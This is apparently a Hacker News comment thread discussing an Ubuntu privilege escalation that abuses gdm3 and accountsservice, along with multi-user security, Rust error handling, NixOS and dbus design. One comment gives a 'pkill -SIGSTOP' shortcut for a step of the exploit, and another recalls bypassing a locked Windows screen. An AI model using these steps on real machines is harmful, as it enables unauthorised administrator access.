Exactly, I'm running fine without Pulseaudio, Policykit and SystemD. Good old sysv init scripts always work, less complexity means less chance for bugs creeping in.


I honestly have no faith in multi user linux. I would never give someone I didn't trust an unprivileged account on my system, nor physical access to my device.

There are so few multi user machines in existence that I doubt this mode of usage will ever get enough attention to be even moderately secure.


All nontrivial multi-user installations I'm aware of (universities, corporate, ... make it a dozen I've had to deal with) have one thing in common: none of them use things like accountsservice, policykit et al. Any extra plumbing, if necessary, is done through PAM one way or another.


Pretty much all servers I've ever worked with were multi-user. What's even the alternative? A single account shared by all admins? That sounds like a nightmare from both a security and an auditing perspective.


But in that case hopefully all the admins are trusted. Parent was talking about untrusted users.


Right, my response was primarily to the claim that “there are so few multi user machines in existence”.

As for trust, there are probably few, if any, attack vectors more common than privilege escalation, so I’m not sure I follow that line of reasoning either.


machines in universities are typically multi user


The students are also trusted, or at least accountable. It's very different from a random stranger. That said, I wouldn't store anything truly private on a shared box like that, especially at a university, where the boxes are likely to be maintained by inexperienced undergrads.


> The students are also trusted

That is a tall bet :D

If anyone is going to try out crazy stuff for the sake of curiosity/pranks, it would be students.


> I doubt this mode of usage will ever get enough attention to be even moderately secure.

Don't shared web hosts count?


There is a lot of discussion in this thread about the involved components, technical details of the exploit, the guilt of specific distributions and patch policies.

However, the underlying core problem of the vulnerability is absolutely independent of any specific component, vendor, product or policy. The core problem is developers not thinking their stuff through. Reading from a file is an absolutely non-trivial task; a million things can go wrong, and the responsible developer has to foresee and handle them all in a generically sane way. Maybe do not read until EOF if you never expect more than a few bytes? Read the file asynchronously with a timeout? Taint the input? Do not put the system in a dependent, insecure state before the operation succeeds. Expect stuff to fail and code accordingly! Think like a hacker and try to hack your own code. And do this for every single line of your code.

I learned to introspect my code in this way as a byproduct of learning Rust. It began with Rust's strict type system, which forced me to carefully consider each and every value and variable and how I toss them around and how and where and how long I am going to access them in my code. It continued with the error handling policies of Rust in a similar way. The learning curve of Rust was steep for me and coding the first months was tedious. But once I got the hang of it, I started to love it. Fighting the compiler, I have to go through every aspect of my code in a super careful way over and over again and once the compiler gives the Go, I feel love and appreciation for my code - as if I crafted something special, that was approved by the master. Code no longer was for me something thrown into the editor as fast as possible with just the effort to make it run somehow reliably. I felt now, as if my code was a piece of art, well thought out and beautifully crafted, made to serve for many years, like a musical instrument. In other words, Rust was changing the appreciation of my own work and gently shoved me to a more careful approach of coding.

At some point in development I go through my code to do some manual formatting, you know, aesthetic stuff like indenting to make the code look more beautiful (in a human way, not a linter's way). Like a last polish. And on this run, I look at my code as a hacker. How would I crack it? How would it handle this or that exception? I try to think really evil. I think many programmers shy away from this step, because it can mean a lot, a lot of new work. And this is where zero-days like the one described in the thread originate.


> [...] gdm3 thinks that there are zero user accounts and it launches gnome-initial-setup.

What if the root user intentionally deleted all non-root users? Would GDM just let anyone create a user in wheel?


The root user obviously counts as a user account, otherwise you would be prompted to make a new account on every startup if you hadn't made any other accounts. The reason why it thinks there are zero accounts in this instance is because you've just killed the service daemon that would provide that number, so no number is received through the DBus call.


Wonderful write-up, a great step-by-step description and some more insights into the underlying problems. There should be more write-ups structured like this!


A well-written article and a noteworthy exploit explanation. Bravo! 10/10


The root cause is a very common bug: treating no response as an empty response. It's usually caused by missing or bad error handling. Some libraries and RPC APIs make it impossible to differentiate between the two cases.

I've recently learned a lot of Rust. Rust's std::result::Result type [1] helps avoid this error. I think it is superior to the error handling facilities in other languages:

- C: errno, boolean return values, `null`

- C++: exceptions, errno, boolean return values, `null`; std::expected<T,E> is being developed

- Java: exceptions, `null`, Optional<T>

- Golang: `nil`, `error`, `if err != nil { return nil, err }` boilerplate

- Javascript: `undefined`, exceptions, futures

- Python: exceptions, `None`, boolean return values

- Swift: exceptions, `nil`, `try?`, optional values

- Dart: exceptions, futures, `null`

Would it be worthwhile to create Result-like error handling libraries for the major languages?

[1]: https://doc.rust-lang.org/book/ch09-02-recoverable-errors-wi...


Excellent job of research and presentation!


Very good writeup. It's amusing that Ubuntu didn't double check in the user creation tool to ensure there was in fact no current administrator account.

Sounds like a fun day to me.


An administrator account, in this context, is one that's a member of the "sudo" group. It's perfectly ordinary for more than one account to be a member of that group.


More unwanted complexity in the base system :(

I wish I had a Linux distro that split the OS from the userland more neatly.

I want to boot into something minimal and static, and then add complexity from there. Maybe logging in to a local container instead of the actual OS?

Linux as an easily extendable building filled with rooms and workshops and entertainment areas, rather than Linux as a mere desktop.


NixOS, my friend. NixOS.

I still can't believe it's not more widely used (and I only started using linux full-time earlier this year). It confines the entire (non-user) filetree into the read-only /nix directory, and manages every single component of the OS through Nix, the package manager - and I guess nix-daemon in the case of NixOS specifically - 100% declaratively. You define the entire thing through a single configuration.nix file.

You can even do crazy stuff like erasing the root upon each reboot, leaving only /nix and /home if you wanted, and I think I remember in the article I was reading about it that it can mount everything on a tmpfs or something like that, so you have a perfectly "clean" root tree every time you restart the computer (as /nix is stateless, it's guaranteed not to change except when rebuilding the system configuration).

The point of nixos is really the declarative aspect, with "splitting" the OS being more of a secondary benefit, but for your case, you might like the whole declarative builds thing in general to accomplish that.


> NixOS, my friend. NixOS.

Is there an option that doesn't require everyone who uses it to learn an entirely new language?


>Is there an option that doesn't require everyone who uses it to learn an entirely new language?

This.

Also, in my experience proponents of NixOS significantly understate the technical complexity and various idiosyncrasies present in trying to get NixOS set up and usable for daily driving. I found several examples where the documentation was unclear, confusing, or out of date.

Coming from DevOps, I'm certainly a fan of declarative/immutable patterns, but it feels like NixOS requires more work than some would have you believe.


One of the joys of computing is that sometimes you have to educate yourself on new developments.


Maybe look into Qubes OS? I've never used it, but the concept sounds kinda like what you're describing: "a security-focused desktop operating system that aims to provide security through isolation. Virtualization is performed by Xen, and user environments can be based on Fedora, Debian, Whonix, and Microsoft Windows, among other operating systems." (from Wikipedia)


Besides NixOS, which is mentioned by jdally987, Fedora Silverblue also fits that bill. A basic immutable desktop OS with atomic updates/rollbacks. Applications are installed through Flatpaks or containers (per Fedora Toolbox or podman).


This reminds me of when I figured out how to get into the desktop from a locked Windows machine (can't remember which one, maybe 95). It was my "party trick" for a while and friends thought I was a hacker. Then I learned this was commonly known, and later nobody believed me that I had found it on my own.


What trick did you use?


I can't remember exact details, but I was able to open help from the locked screen and then from help I was able to launch the explorer. I think it was similar to this: https://i.imgur.com/rG0p0b2.gif


>The next step is to send a SIGSTOP signal to accounts-daemon to stop it from thrashing that CPU core. But to do that, you first need to know accounts-daemon’s process identifier (PID).

Or just 'pkill -SIGSTOP accounts-daemon'. pkill matches by process name.


Not sure why this wasn't a dupe of my submission [1] submitted ~8 hours earlier? Oh well.

[1] https://news.ycombinator.com/item?id=25046588


What the hell does accountsservice do, and why does Ubuntu need a dedicated service for that?

To clarify: do we really need a service (and an unsafe, exploitable one) to do something we've been doing without it for years on all other distros?


I actually got a decent answer to this, from what appears to be a developer working on something in the FreeDesktop.org ecosystem:

> Way better for writing gui apps against instead of wrapping suid binaries and parsing strings horribly.

I would call that a laudable goal. Just seems like the design needs a deep security review.


The unsafe part here was GDM, not accountsservice.


Modern Linux kernel APIs are asynchronous spaghetti. Someone realized blocking userspace could be a performance issue (you need to spawn a thread to invoke the kernel API if you want to stay responsive while the kernel does stuff), and that using the setuid bit in large daemons is dangerous (they had already decided to abandon the unix way, where there are small binaries, and each does one thing well). The solution was to make everything asynchronous without providing proper barrier operations, expose it via local network daemons, and to layer a new permissions system atop it.

To see why this makes things hard, consider using modprobe to load a hardware driver. It has to detect and initialize hardware, and this can take some time. That happens in the background, so you need to be able to ask the driver if the hardware has “settled” before proceeding. Otherwise, you can’t differentiate between “zero wifi cards” and “wifi card is almost ready”. That’s probably fixable, but hardware isn’t attached to a flat bus. What if the wifi is on a usb bus that’s initializing? What if it’s plugged into a usb hub that’s initializing?

The “solution” is to double down on the problem: introduce an event bus that anything can talk to, and have it asynchronously forward messages between processes and the kernel. It eventually tells userspace when new hardware arrives, but that creates a new problem. How long should the startup scripts wait to start things like ntp and nfs clients? You can’t interact safely with the filesystem until those daemons are ready. What about X11? Locking users out when there’s no video card is bad. So is dropping to a text prompt for a few seconds.

Anyway, it’s clear this was never thought through to a clean solution. Clean solutions exist in other systems, of course, but not here. Before systemd became the spearhead of this train wreck, people frequently complained about dbus (the subject of this article) for exactly these reasons. So, it’s not surprising there are security holes like this. We’re currently in a situation where Linux’s userspace has reimplemented unix permissions in a way that only a few understand, and manages a sprawling multi-process asynchronous state machine on top of that. The authors of this mess didn’t bother to write manpages for the underlying daemons, so the inner workings of this stuff are extremely obscure and unvetted. Worse, it has hooks into everything in the Linux desktop, and has been spreading like cancer for over a decade.


I think there is a large part of that story missing. If the accounts daemon drops privileges for reading from the user's home, how can it ever get back to its normal state? How could two users run the same operation concurrently?

Normally that privilege dropping should happen after forking, right? And if it does the parent process should respond to gdm's inquiry.

That being said, the initial-setup thing is probably good for a few more escalations, as its use case does not seem to fit the standard security measures very well.


From the setresuid(2) man page:

> An unprivileged process may change its real UID, effective UID, and saved set‐user‐ID, each to one of: the current real UID, the current effective UID or the current saved set‐user‐ID.

accountsservice did something like setresuid(uid, uid, -1), which set both real and effective UIDs, but kept saved set‐user‐ID as root, so that it could re-gain root privileges later.

Setting EUID was the correct course of action; but setting real UID let the unprivileged user kill the process.


Would it have been possible to attach a debugger to accountsservice in this state and execute arbitrary code, including re-gaining root privileges?


Very good question. :-) No, you can't use ptrace(2) on a process that has changed its EUID. For details, see PR_SET_DUMPABLE in the prctl(2) man page.


Great. I expected that possibly the real UID controlled this, it's good that it's not the case.


No, you can't usually attach a debugger to a process (with Ubuntu's default settings).


I believe with seteuid the process can temporarily assume the uid of the user in question and later restore the original uid.

